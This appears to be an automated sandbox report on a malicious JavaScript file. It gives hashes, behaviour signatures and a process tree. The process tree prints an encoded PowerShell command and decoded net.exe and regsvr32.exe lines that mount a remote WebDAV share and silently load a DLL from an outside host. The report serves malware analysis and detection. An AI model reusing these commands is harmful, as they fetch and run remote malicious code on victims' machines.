Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2024, 15:39

General

  • Target

    70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js

  • Size

    14KB

  • MD5

    f565069bbe97855d32a7e9858d4b8ef6

  • SHA1

    d3344bd0537addf599ea6682c5871c65887888b0

  • SHA256

    70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58

  • SHA512

    ae791a1cf92182dcc7c105204fca1f2e275daa8e1724d440d79f25e5111d56d7afa07290b88059238003f46b0b8e2ee0ecd989f07c44689ef2a4f7e64463d2d1

  • SSDEEP

    96:Ulm1iYg+hW6LOQFLrIjHOZqlfKXq+OdhDidHclR7DewP3/vIkP0OqRozopEGv558:SO7hlsebzE5Pn4H63wC

Malware Config

Signatures

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\70ec5624f3d3b10e06cc21ff625d8871f81e4d5de1ee2c921a963df7a4015c58.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADEAOQA5ADQAMgAwADIAMAA1ADUAOQAzADUALgBkAGwAbAA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
        3⤵
          PID:2616
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\11994202055935.dll
          3⤵
            PID:2768

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2756-4-0x000007FEF5A5E000-0x000007FEF5A5F000-memory.dmp

        Filesize

        4KB

      • memory/2756-6-0x0000000001E60000-0x0000000001E68000-memory.dmp

        Filesize

        32KB

      • memory/2756-5-0x000000001B830000-0x000000001BB12000-memory.dmp

        Filesize

        2.9MB

      • memory/2756-7-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

        Filesize

        9.6MB

      • memory/2756-9-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

        Filesize

        9.6MB

      • memory/2756-10-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

        Filesize

        9.6MB

      • memory/2756-8-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

        Filesize

        9.6MB

      • memory/2756-11-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp

        Filesize

        9.6MB